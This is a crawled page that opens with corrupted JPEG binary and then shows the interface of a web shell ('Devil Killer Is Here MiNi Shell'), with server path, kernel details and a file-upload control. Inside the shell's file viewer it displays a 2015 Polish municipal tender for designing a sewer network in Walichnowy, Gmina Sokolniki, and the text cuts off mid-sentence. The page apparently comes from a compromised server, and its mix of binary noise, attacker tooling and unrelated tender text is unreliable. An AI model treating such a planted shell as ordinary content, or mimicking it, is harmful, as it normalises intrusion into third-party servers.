JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150624/153748-N-2015.html

<p class="kh_header"><b>Sokolniki: Wykonanie usługi projektowej - Budowa sieci kanalizacji Gminy Sokolniki dla miejscowości Walichnowy</b><br>
<b>Numer ogłoszenia: 153748 - 2015; data zamieszczenia: 24.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Sokolnikach , ul. Marsz. Józefa Piłsudskiego 1, 98-420 Sokolniki, woj. łódzkie, tel. 062 7845176, faks 062 7845194.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sokolniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi projektowej - Budowa sieci kanalizacji Gminy Sokolniki dla miejscowości Walichnowy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie pełno branżowej dokumentacji projektowo -
      wykonawczej sieci kanalizacji sanitarnej, grawitacyjnej, tłocznej, przepompowni wraz z
      odgałęzieniami do działek zabudowanych i odbudową nawierzchni.
  2.Usługa obejmuje wykonanie kompletnej dokumentacji projektowej wraz z niezbędnymi
      uzgodnieniami oraz uzyskanie na rzecz Zamawiającego pozwolenia na budowę.
3.Przedmiot zamówienia obejmuje wszelki prace, badania i czynności niezbędne do wykonania
   przedmiotu zamówienia, zgodnie z obowiązującymi przepisami oraz wymaganiami
   Zamawiającego. Wykonawca musi przewidzieć wszystkie okoliczności które mogą mieć wpływ
   na wykonanie przedmiotu zamówienia. Sieć kanalizacyjna winna być zaprojektowana na obszarze
   przewidzianym do skanalizowania - obszar przewidziany do skanalizowania został wskazany
   na załączniku graficznym - zał . Nr 1 do umowy.
   Mapa poglądowa stanowiąca załącznik do niniejszej umowy na której wskazano obszar objęty
   projektowaniem nie może być przedmiotem roszczeń Wykonawcy w stosunku do Zamawiającego
   zarówno pod względem planowanych rozwiązań technicznych, przebiegu projektowanych tras
   kanalizacyjnych jak również ewentualnych roszczeń w zakresie ewentualnych robót dodatkowych
   oraz zamiennych. Opracowana dokumentacja winna być kompletna. 
4.Ścieki z projektowanej kanalizacji zostaną przetransportowane projektowanym kolektorem 
   do istniejącej oczyszczalni ścieków, której właścicielem jest Spółdzielnia Mleczarska
   (OSMLECZ) w Sokolnikach w upadłości likwidacyjnej, ul. Marszałka Józefa Piłsudskiego 3,
    98 - 420 Sokolniki.
5.Kanalizacje sanitarną oraz przepompownie należy zaprojektować w technologii oraz w takich
   parametrach, które zapewniają perspektywicznie odbiór ścieków z całego obszaru wskazanego
   do skanalizowania. 
6.W zakres przedmiotu zamówienia wchodzą wszelkie prace projektowe, badania oraz czynności
   niezbędne do wykonania przedmiotu zamówienia w pełnym zakresie określonym w niniejszym 
   zamówieniu.
   1) orientacyjna długości projektowanego zakresu do skanalizowania : 
        a) sieć kanalizacyjna - 7,00 km,
        b) przyłącza kanalizacyjne - 190 szt.
   Podane wielkości są wielkościami orientacyjnymi odmierzonymi w prostej linii zabudowy po
   sieci drogowej i nie odzwierciedlają rzeczywistej długości projektowej sieci.
   Rzeczywista długość sieci kanalizacyjnej opracowania projektowanego będzie wynikiem
   zastosowania rozwiązań przez Wykonawcę oraz rzeczywistego zapotrzebowania Zamawiającego
   na obszarze objętym projektowaniem i może ulec zmianie w zależności od potrzeb. Z tytułu
   różnicy projektowanej sieci w stosunku do szacowanej długości Zamawiający nie przewiduje 
   żadnych rekompensat finansowych. Na Wykonawcy ciąży obowiązek wykonania wizji w terenie
   celem właściwego oszacowania wszelkich niezbędnych kosztów opracowania dokumentacji jak
   również uzyskania niezbędnych danych.
7.Dokumentacja techniczna winna być kompletna w zakresie dokumentów niezbędnych do
   uzyskania pozwolenia na budowę, jak również kompletna w zakresie opracowania
   projektowanego przedmiotu zamówienia. Projekt winien uwzględniać najbardziej nowoczesne
   rozwiązania techniczne, przy maksymalnym zminimalizowaniu kosztów eksploatacyjnych.
8.Zakres opracowania dokumentacji obejmuje : 
   1) skompletowanie wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgody na 
       realizację przedsięwzięcia wraz z niezbędnymi załącznikami w tym poświadczonymi  przez  
       właściwy organ kopiami map ewidencyjnymi obejmującymi przewidywany teren, na którym
       realizowane będzie przedsięwzięcie oraz obejmującej obszar, na które będzie oddziaływać
       przedsięwzięcie,
       a) przeprowadzenie oceny oddziaływania na środowisko i ewentualnego opracowania raportu
           oceny oddziaływania na środowisko w przypadku konieczności jego sporządzenia,
       b) uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia
       c) dokumentacja geotektonicznych warunków posadowienia kanalizacji sanitarnej i pompowni,
       d) uzyskanie aktualnych map do celów projektowych wraz z posadowieniem infrastruktury
           podziemnej i nadziemnej, 

       e) wypisy z ewidencji gruntów obejmujący przewidywany teren, na którym realizowana będzie 
           inwestycja oraz obszar na którym będzie oddziaływać przedsięwzięcie z ośrodka ewidencji 
           gruntów, 
         f) wnioski o wydanie warunków technicznych do wszystkich gestorów infrastruktury
             technicznej na obszarach objętych zamówieniem publicznym, pozyskanie stosownych
             decyzji oraz niezbędnych uzgodnień w tym zakresie, 
         g) projekt przebudowy kolizji projektowanej sieci kanalizacyjnej z istniejącą infrastrukturą
              techniczną,
         h) przyłącza kanalizacyjne należy zaprojektować od sieci głównej granicy nieruchomości lub
             do pierwszej studzienki. Przyłącza należy zaprojektować do działek zabudowanych. 
              - sporządzić wykaz wszystkich przyłączy z podaniem numeru działki, adresu właściciela  
                 działki i długości przyłącza do granicy nieruchomości,
         i) zaleca się, aby trasa projektowanego uzbrojenia zlokalizowana była przede wszystkim 
             w pasie drogowym, będącym w zarządzie właściciela drogi. Jedynie tam gdzie będzie  
             tam niemożliwe dopuszcza się lokalizację rurociągu w innych terenach pod warunkiem
             uzgodnienia tego z Zamawiającym. W tym przypadku należy załączyć zgody właścicieli na
             pobudowania uzbrojenia na tej działce,
         j) sporządzić informację dotyczącą bezpieczeństwa i ochrony zdrowia - art.20 ust.1 pkt.1b 
             ustawy Prawo budowlane,
         k) sporządzić specyfikację techniczną wykonania i odbioru robót ze szczegółowym opisem
             i wymaganiami dla proponowanych materiałów przewidzianych do wbudowania
             wykonania przedmiaru robót oraz kosztorysów inwestorskich,
             - przedmiar robót i kosztorysy inwestorskie należny sporządzić dla każdej branży
               oddzielnie, 
         l) prowadzenie uzgodnień, wprowadzenie modyfikacji lub rozwiązań zamiennych stosunku do 
            rozwiązań projektowych w przypadku stwierdzenia w trakcie budowy wad i usterek bądź
            braków nieumożliwiających prowadzenie robót,  
         k) bilans ilościowy ścieków wykonany obliczeniowa z przedstawieniem w sposób
             szczegółowy metody wykonanych obliczeń bilansu ścieków,
       m) sprawowanie w trakcie trwania całej inwestycji nadzoru autorskiego we wszystkich
            branżach w ramach wynagrodzenia określonego przez Wykonawcę w niniejszym
            postępowaniu (minimum 1 raz na 2 miesiące, a w przypadku koniecznym na każde
            wezwanie Zamawiającego),
        n) w przypadku lokalizacji sieci kanalizacyjnej w pasie drogowym (jezdni, chodniku,  
             poboczu)
             należy zaprojektować odtworzenie nawierzchni na całej szerokości drogi wg warunków
             technicznych uzyskanych od zarządcy drogi, 
         o) uzyskanie w imieniu pozwolenia wodno - prawnego, jeżeli będzie wymagane,
         p) uzgodniony z właścicielem projekt dotyczący dojazdu do projektowanej przepompowni
              ścieków, projekt przyłącza energetycznego wraz z niezbędnymi urządzeniami
              pomiarowymi, projekt zasilania awaryjnego wraz z doborem agregatu prądotwórczego,
          r) projekt technologii wykonania robót, 
          s) projekt organizacji ruchu na czas trwania robót,
          t) opracowanie innych niezbędnych dokumentów umożliwiających uzyskanie pozwolenia 
              na budowę,
          u) w wycenie należy uwzględnić wszystkie koszty uzyskania aktualnych map sytuacyjno -  
              wysokościowych, uzgodnień, decyzji, opinii, postanowień niezbędnych do uzyskania
              prawomocnej decyzji pozwolenia na budowę i wykonania zadania zgodnie z
              obowiązującymi przepisami,
   


      2) Zobowiązuje się Wykonawcę do wykonania przedmiotu umowy m.in. zgodnie z art. 29-31
           ustawy Prawo zamówień publicznych (Dz. U z 2013 r, poz.907 z późń. zm.)
      3) W dokumentacji nie należy używać znaków towarowych, patentów, pochodzenia, oznaczeń
           producentów i nazw własnych. W wyjątkowych sytuacjach w przypadku wskazania 
           w dokumentacji projektowej znaków towarowych, patentów, pochodzenia, oznaczeń
           producentów i nazw własnych Wykonawca w każdym takim przypadku zobowiązany jest 
           piśmie łącznie : 
            a) uzasadnić, że taki opis podyktowany jest specyfiką przedmiotu zamówienia,
            b) wskazać, iż nie można opisać przedmiotu zamówienia za pomocą dostatecznie
                 dokładnych określeń, 
            c) dopuścić w tym zakresie rozwiązania równoważne poprzez dodatnie wyrazów 
                 (lub równoważny)
             d) określić parametry rozwiązań równoważnych,
        4) w przypadku powoływania się w projekcie na normy, aprobaty, specyfikacje techniczne
             i systemy odniesienia, o których mowa w art.30 ust.1-3 ustawy Prawo zamówień
             publicznych  (Dz. U z 2013 r, poz.907, z późń.zm.), Wykonawca zobowiązany jest
             wskazać, że dopuszcza rozwiązania równoważne i określić parametry tych rozwiązań.
        5) Dokumentacje projektowe muszą być wykonane w stanie kompletnym z punktu widzenia
             celu, któremu mają służyć. Dokumentacje projektowe będą służyć jako : 
             a) opis przedmiotu zamówienia w przetargach na roboty budowlane, które będą
                 prowadzone zgodnie z ustawą Prawo zamówień publicznych (Dz. U z 2013, poz.907, ze
                 zm.),
             b) podstawa realizacji pełnego zakresu robót budowlanych niezbędnego dla użytkowania 
                  obiektu zgodnie z przeznaczeniem, 
              c) załącznik do uzyskania decyzji o pozwoleniu na budowę,
              d) załącznik do uzyskania pozwolenia wodnoprawnego,
              e) załącznik do uzyskania decyzji środowiskowych. 
9.Dokumentacje będą służyć jako opis przedmiotu zamówienia w przetargach na roboty budowlane,
   które będą prowadzone zgodnie z ustawą Prawo zamówień publicznych, realizacji pełnego
   zakresu robót budowlanych niezbędnego dla użytkowania obiektu zgodnie z przeznaczeniem,
   uzyskania pozwolenia na budowę, decyzji środowiskowych, pozwolenia wodno - prawnego. 
10.W ramach prac projektowych Wykonawca zobowiązany jest do : 
    1) sprawowanie nadzoru autorskiego w trakcie realizacji inwestycji objętej niniejszym
        opracowaniem,
    2) udziału we wszystkich spotkaniach koordynacyjnych, które odbywać się będą na etapie
        realizacji projektu, 
    3) aktualizacji w okresie co najmniej 48 miesięcznym dokumentacji kosztorysowej dla  
         potrzeb Zamawiającego bez dodatkowego wynagrodzenia, 
    4) wprowadzenia modyfikacji lub rozwiązań zamiennych w przypadku zgłaszanych przez
         inwestora wad lub braków nieuniemożliwiających realizację inwestycji, zastosowania 
         niewłaściwych rozwiązań mogących mieć niekorzystny wpływ na funkcjonowanie i koszty 
         eksploatacji,
     5) wyjaśnianie wątpliwości dotyczących projektu i zawartych w nim rozwiązań na etapie
          prowadzenia procedury przetargowej i realizacji inwestycji. 
11.Projekt budowlany i projekt wykonawcy w wersji papierowej należy opracować w 5 egz.
     Na nośnikach CD i DVD - 2 egzemplarze. 



12.Dokumentacja techniczna na nośnikach CD i DVD, oraz wersji papierowej winna zawierać : 
     1) rysunki w formacie pdf, tekst w formacie pdf lub doc,
     2) przedmiary robót winny być zapisane w formacie pdf lub doc,
     3) kosztorysy inwestorskie, przedmiary robót winny być zapisane w formacie pdf lub doc,
     4) SST ze szczegółowym opisem uzgodnionym z Zamawiającym materiałów i urządzeń,
     5) wszystkie dokumenty uzupełniające, decyzje opinie oraz inne winny być zamieszczone
         na nośnikach CD i DVD.
13.Dokumentacja w wersji elektronicznej przekazana na nośnikach CD i DVD oraz w formacie pdf
     winna umożliwiać ich wydruk.
14.Dokumentacja projektowo kosztorysowa ma być zrealizowana zgodnie z obowiązującymi
     przepisami : 
     1) Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 
         25 kwietnia 2012 r, w sprawie szczegółowego zakresu i formy projektu budowlanego
         (Dz. U z 2012 r, poz.246),
     2) Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r, w sprawie metod i podstaw
         sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych
         oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno -
         użytkowym (Dz. U z 2004 r, Nr 130, poz.1389), 
     3) Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r, w sprawie szczegółowego 
         zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru
         robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U Nr 202, poz.2072,
         ze zmianami),
     4) ustawy z dnia 7 lipca 1994 r - Prawo budowlane (Dz. U z 2013 r, poz.1409, ze zmianami),
     5) ustawy z dnia 18 lipca 2001 r - Prawo wodne (Dz. U z 2015 r, poz.469), 
     6) ustawa z dnia 27 kwietnia 2001 r - Prawo Ochrony Środowisko (Dz. U z 2013 r, poz.1232,
         ze zmianami).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.25.00.00-5, 71.35.40.00-4, 71.24.80.00-8, 79.93.30.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości : 3.000,00 zł , słownie : 
       trzy tysiące złotych 00/100
2.Wadium może być wnoszone w jednej lub kilku następujących formach : 
      1) pieniądzu,
      2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej
          z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
      3) gwarancjach bankowych,
      4) gwarancjach ubezpieczeniowych,
      5) poręczeniach udzielonych przed podmioty, o których mowa w art.6b ust.5 pkt.2 ustawy 
          z dnia 9 listopada 2000 r, o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
          (Dz. U. z 2007 r, Nr 42 poz.275, ze zmianami).
3.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek  bankowy Rejonowego
      Banku Spółdzielczego w Lututowie, oddział w Sokolnikach,
      nr konta : 42 9256 0004 4200 0114 2000 0080 z adnotacją : wadium przetargowe -
      budowa sieci kanalizacyjnej w Gminie Sokolniki - dla miejscowości Walichnowy.     
4.Wadium wniesione w pieniądzu Zamawiający przechowuje się na rachunku bankowym.                                                       
5.Wadium wniesione w pieniądzu należy złożyć  przed terminem składania
      ofert. Przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin
      uznania na rachunku bankowym Zamawiającego. 
6.Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z umowy
      rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty
      prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek
      bankowy wskazany przez Wykonawcę.
7.Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem 
      z ofertą w osobnej kopercie. 
8.Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać 
      stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty 
      wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego  
      bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela. 
9.Niewniesienie wadium : 
1) do upływu terminu składania ofert;
2) na przedłużony okres związania ofert;
3) przez Wykonawcę, którego oferta została wybrana jako najkorzystniejsza w wyniku rozstrzygnięcia odwołania, w terminie, wyznaczonym przez Zamawiającego
                  skutkować będzie wykluczeniem z udziału w postępowaniu.
10.Oferta niezabezpieczona wadium w jednej lub kilku z podanych wyżej form zostanie
         wykluczona bez rozpatrywania.
11. Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po wyborze
         najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego
        oferta zostanie wybrana jako najkorzystniejsza.
12.Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci 
         wadium niezwłocznie po zawarciu umowy.
13. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę
         przed upływem terminu składania ofert.
14.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została 
         wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
         określonych w ofercie, lub zawarcie umowy w sprawie zamówienia publicznego stało się
         niemożliwe z przyczyn leżących po stronie Wykonawcy.
15.W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte 
        w art.45 i art.46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonywania przedmiotu zamówienia nie wymaga
        posiadania specjalnych uprawnień;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować, że w okresie ostatnich trzech lat przed
upływem terminu składania ofert, a jeżeli okres
        prowadzenia działalności jest krótszy w tym okresie wykonał co najmniej 1 opracowania
        projektu sieci kanalizacji sanitarnej, grawitacyjnej i ciśnieniowej o średnicy min.200 mm i
       7 000 m, długości z przepompowniami ścieków i przykanalikami.
W celu potwierdzenia, że Wykonawca posiada niezbędną do wykonania zamówienia wiedzę
i doświadczenie do oferty należy dołączyć wykaz wykonanych dokumentacji projektowych odpowiadających opisowi oceny spełnienia warunku udziału w postępowaniu sporządzony według wzoru stanowiącego załącznika nr 6, do niniejszej SIWZ oraz dowody potwierdzające, że dokumentacje projektowe wykonane należycie.
      Dowodami potwierdzającymi, że dokumentacje projektowe odpowiadające opisowi oceny spełnienia warunku udziału w postępowaniu zostały wykonane należycie są : 
- poświadczenia lub,
- oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze
  Wykonawca, nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
Zaleca się, aby przedkładane dowody potwierdzające, że wykonane przez Wykonawców dokumentacje projektowe zostały wykonane należycie zawierały,co najmniej : 
1) wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu wykonał dokumentacje
     projektowe, których dokumenty dotyczą,
2) wskazanie podmiotu, na rzecz którego realizowane były ww. dokumentacje projektowe,
3) wskazanie przedmiotu (zakresu) dokumentacji projektowej,
4) wskazanie miejsca wykonania,
5) wskazanie daty wykonania (rozpoczęcia i zakończenia),
6) opinie podmiotu wskazanego powyżej stwierdzającego, że dokumentacje projektowe zostały 
     wykonane należycie.
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego dokumentacje projektowe wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów potwierdzających, że te dokumentacje projektowe zostały wykonane należycie.
W razie konieczności szczególnie, gdy wykaz lub dowody, o których mowa powyżej budzą wątpliwości Zamawiającego lub, gdy z poświadczenia albo innego dokumentu wynika, że zamówienie nie zostało wykonane lub wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio od właściwego podmiotu na rzecz, którego dokumentacje projektowe były wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.

Uwaga ; przez usługi projektowe związane z przedmiotem zamówienia oraz proporcjonalnie  do przedmiotu zamówienia rozumie się wykonanie co najmniej jednej usługi projektowej polegającej na wykonaniu opracowaniu projektu sieci kanalizacji sanitarnej, grawitacyjnej o średnicy min. 200 
mm, długości co najmniej 7 000 m z przepompowniami ścieków i przykanalikami, o wartości co 


najmniej 100.000,00  zł (brutto), słownie : sto tysięcy złotych 00/100. Nie można sumować zamówień o mniejszej wartości, aby uzyskać powyższą wartość

Ocena spełnienia tego warunku nastąpi na podstawie weryfikacji wykazu o którym mowa , zawierającego główne usługi wskazane przez Wykonawcę, jednakże w ilości co najmniej 1 (jednej) 
Do wymienionych w wykazie usług projektowych Zamawiający żąda załączenia dowodów (w rozumieniu paragrafu 1 ust.2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r, w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U z 2013 r, poz.321), potwierdzających, że każda z  usług wskazanych w wykazie została wykonana w sposób należyty oraz wskazujących, czy zostały one wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnego warunku udziału</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże osobę posiadającą kwalifikację zawodowe, doświadczenie i uprawnienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 r (t.j. Dz. U z 2013 r, poz.1409, ze zmianami), lub odpowiadające im uprawnienia wydane na podstawie wcześniejszych regulacji ustawy z dnia 15 grudnia 2000 r., o samorządach zawodowych architektów i inżynierów budownictwa oraz urbanistów (Dz. U z 2014 r, poz.1946), na stanowisku :     
           a) projektanta robót budowlanych - branża budowlana - uprawnienia budowlane - w 
               specjalności konstrukcyjno - budowlanej w ograniczonym zakresie uprawniają do projektowania konstrukcji obiektu lub kierowania robotami budowlanymi w odniesieniu do konstrukcji obiektu, o kubaturze do 1 000 m3, oraz ; 1) o wysokości do 12 m nad poziom terenu, do 3 kondygnacji nadziemnych i o wysokości kondygnacji do 4,8 m,2) posadowionego na głębokość do 3 m poniżej terenu , bezpośrednio na stabilnym gruncie nośnym; 3) przy rozpiętości elementów konstrukcyjnych do 6 m i wysięgu wsporników do 2 m, 4) niezwierającego elementów wstępnie sprężanych na budowie, 5) niewymagającego uwzględnienia wpływu eksploatacji górniczej,( lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów),
          b) projektanta robót drogowych - uprawnienia w specjalności inżynieryjnej drogowej w
